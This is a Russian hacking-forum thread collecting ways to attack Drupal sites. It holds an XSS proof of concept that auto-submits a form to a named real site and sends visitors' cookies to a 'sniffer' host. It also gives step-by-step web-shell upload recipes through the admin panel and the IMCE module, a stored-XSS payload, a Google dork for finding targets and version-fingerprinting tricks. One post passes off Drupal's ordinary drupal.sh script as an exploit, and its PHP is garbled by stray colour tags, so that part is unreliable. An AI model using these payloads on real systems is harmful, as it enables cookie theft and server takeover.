ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
[ Обзор Уязвимостей .:Drupal :. ] |
23.02.2008, 01:01
|
|
Постоянный
Регистрация: 16.04.2007
Сообщений: 458
Провел на форуме:
2722721
Репутация:
364
|
|
[ Обзор Уязвимостей .:Drupal :. ]
Последний раз редактировалось Elekt; 22.05.2008 в 00:38..
|
|
|
07.04.2008, 16:46
|
|
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338
Репутация:
165
|
|
узнаем версию
http://path/CHANGELOG.txt
|
|
|
|
22.05.2008, 01:17
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
Последний раз редактировалось Elekt; 22.05.2008 в 01:21..
|
|
|
|
01.12.2008, 06:16
|
|
Новичок
Регистрация: 18.08.2008
Сообщений: 12
Провел на форуме:
39795
Репутация:
0
|
|
вот так версию узнать можно:
Смотрим файл: http://www.site.ru/modules/system/system.module ... Там есть строчка:
define('VERSION', 'ТУТ ВЕРСИЯ');
Если строчки нет, то версия ниже 4.7.0
Дополню пост:
в некоторых модулях написана версия, к примеру:
site.ru/modules/aggregator/aggregator.info там прямо смотрим строчку version и всё.
З.Ы. почему бы не прикрепить тему, тоже нужная вещь
Последний раз редактировалось kirufka; 02.12.2008 в 00:12..
|
|
|
|
23.02.2009, 22:13
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
PoC:
<HTML>
<TITLE>Drupal reflected XSS by ettee(itdefence.ru)</TITLE><!--
Full HTML =on
"">><<script>img = new Image(); img.src = "http://sniffer/image/s.gif?"+document.cookie;</script>
--><BODY onload="p.submit()">
<form action="http://freelanguage.org/comment/reply/532/1263"<!--target--
> method="post" id="p">
<input type=hidden name="subject" value="aaaaaaaaaaaaaaaaaaaaa">
<input type=hidden name="comment" value='"">><<script>alert(document.
cookie)</script>'>
<input type=hidden name="format" value="3">
<input type=hidden name="form_id" value="comment_form">
<input type=hidden name="op" value='Preview comment'>
</form>
</BODY>
</HTML>
Google dork: powered by "drupal"; intitle:"powered by drupal"
|
|
|
|
14.12.2009, 16:21
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Drupal 6.14 - заливка шелла из админпанели
1) Administer->Site building->Активируем Upload "Allows users to upload and attach files to content" (по умолчанию выключено)->Save configuration
2) Administer->Site configuration->File uploads->Добавляем расширение php3 в список разрешенных
3) Create content->Page->создаем и сохраняем страницу (снимаем галочку с Published)
4) Administer->Content management->Edit только что созданную страницу->File attachments->Загружаем шелл с расширением .php3 (если просто .php - в конец автоматически добавляется .txt)
5) http://drupal.ru/sites/default/files/shell.php3 - шелл
6) Administer->Content management->Удаляем страницу
|
|
|
|
20.12.2009, 18:31
|
|
Познающий
Регистрация: 05.03.2006
Сообщений: 44
Провел на форуме:
563256
Репутация:
7
|
|
мои 5 копеек, по файлу robots.txt можно определить версию движка, там есть такая строчка
Код:
# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
|
|
|
|
ещё один способ загрузки шела |
04.02.2010, 02:55
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
ещё один способ загрузки шела
ещё один способ загрузки шела:
Site configuration - IMCE settings выбераем категорию пользователей - в графе Non-image file support: добавляем .php
Затем идем сюда Profile - Personal files грузим шелл и он загрузиться в папку files/папка_пользователя/шелл.пхп
|
|
|
|
13.02.2012, 08:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Drupal 7.0 Shell Execution Script
PHP код:
PHP:
[COLOR="#000000"]#!/usr/bin/env php
[COLOR="#0000BB"]
* ================
* (+) In any Drupal , detecting the file >> http://[local/Path]/scripts/drupal.sh
* The content file 'drupal.sh' is this PHP CODE for EXECUTING Scripts
* ================
* ------------------------
* Check for your PHP interpreter - on Windows you'll probably have to
* replace line 1 with :
* #!c:/program files/php/php.exe
* @param path Drupal's absolute root directory in local file system (optional).
* @param URI A URI to execute, including HTTP protocol prefix.
*/
[/COLOR][COLOR="#0000BB"]$script[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]array_shift[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'argv'[/COLOR][COLOR="#007700"]]));
if ([/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'--help'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'argv'[/COLOR][COLOR="#007700"]]) || empty([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'argv'[/COLOR][COLOR="#007700"]])) {
echo "
Example:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$script[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]"http://target.org/node"
All arguments are long options.
--help This page.
--root Set the working directory for the script to the specified path.
To execute Drupal this has to be the root directory of your
Drupal installation, f.e. /home/www/foo/drupal (assuming Drupal
running on Unix). Current directory is not required.
Use surrounding quotation marks on Windows.
--verbose This option displays the options as they are set, but will
produce errors from setting the session.
URI The URI to execute, i.e. http://default/foo/bar for executing
the path '/foo/bar' in your site 'default'. URI has to be
enclosed by quotation marks if there are ampersands in it
(f.e. index.php?q=node&foo=bar). Prefix 'http://' is required,
and the domain must exist in Drupal's sites-directory.
If the given path and file exists it will be executed directly,
i.e. if URI is set to http://default/bar/foo.php
and bar/foo.php exists, this script will be executed without
bootstrapping Drupal. To execute Drupal's cron.php, specify
http://default/cron.php as the URI.
To run this script without --root argument invoke it from the root directory
of your Drupal installation with
./scripts/[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$script[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]
n
[/COLOR][COLOR="#007700"]EOF;
exit;
}
[/COLOR][COLOR="#FF8000"]// define default settings
[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'index.php'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'default'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PHP_SELF'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'/index.php'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'127.0.0.1'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SERVER_SOFTWARE'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_METHOD'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'GET'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PHP_SELF'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'console'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]// toggle verbose mode
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'--verbose'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'argv'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]$_verbose_mode[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
else {
[/COLOR][COLOR="#0000BB"]$_verbose_mode[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#FF8000"]// parse invocation arguments
[/COLOR][COLOR="#007700"]while ([/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_shift[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'argv'[/COLOR][COLOR="#007700"]])) {
switch ([/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"]) {
case[/COLOR][COLOR="#DD0000"]'--root'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#FF8000"]// change working directory
[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_shift[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'argv'[/COLOR][COLOR="#007700"]]);
if ([/COLOR][COLOR="#0000BB"]is_dir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]chdir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$_verbose_mode[/COLOR][COLOR="#007700"]) {
echo[/COLOR][COLOR="#DD0000"]"cwd changed to:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]n"[/COLOR][COLOR="#007700"];
}
}
else {
echo[/COLOR][COLOR="#DD0000"]"nERROR:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]not found.nn"[/COLOR][COLOR="#007700"];
}
break;
default:
if ([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#DD0000"]'--'[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]// ignore unknown options
[/COLOR][COLOR="#007700"]break;
}
else {
[/COLOR][COLOR="#FF8000"]// parse the URI
[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]parse_url[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// set site name
[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]];
}
[/COLOR][COLOR="#FF8000"]// set query string
[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'query'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'query'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]parse_str[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'query'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#FF8000"]// set file to execute or Drupal path (clean urls enabled)
[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]))) {
[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PHP_SELF'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
}
elseif (isset([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]])) {
if (!isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'q'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'q'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'q'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]];
}
}
[/COLOR][COLOR="#FF8000"]// display setup in verbose mode
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_verbose_mode[/COLOR][COLOR="#007700"]) {
echo[/COLOR][COLOR="#DD0000"]"Hostname set to:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]n"[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]"Script name set to:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]n"[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]"Path set to:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'q'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]n"[/COLOR][COLOR="#007700"];
}
}
break;
}
}
if ([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"])) {
include[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"];
}
else {
echo[/COLOR][COLOR="#DD0000"]"nERROR:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]not found.nn"[/COLOR][COLOR="#007700"];
}
exit();
[/COLOR][COLOR="#FF8000"]/***============================================================================================
***================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
* Greets To : [D] HaCkerS-StreeT-Team [Z]
* Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
* Masimovic * TOnyXED * r0073r (inj3ct0r.com) * TreX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
* Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (1923turk.com)
* Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
* Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
* Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
* 1337day.com * www.packetstormsecurity.org * exploit-db.com * bugsearch.net * exploit-id.com
* www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
*================================================================================================
*/[/COLOR][/COLOR]
4символа
|
|
|
|
27.03.2012, 01:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
10816
Репутация:
74
|
|
Drupal 5.x, возможно более ранние версии.
Уязвим параметр profile_big, field_location[0][city].
POST:
Код:
Code:
www.site.ru/user/ID_пользователя/edit/О себе?form_build_id=&form_token=&form_id=&profile_=test&profile_big=alert('XSS by mr.Penguin')&op=Сохранить
Далее нажмите на "Просмотр" и активная XSS выполнится
Скриншоты:
  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
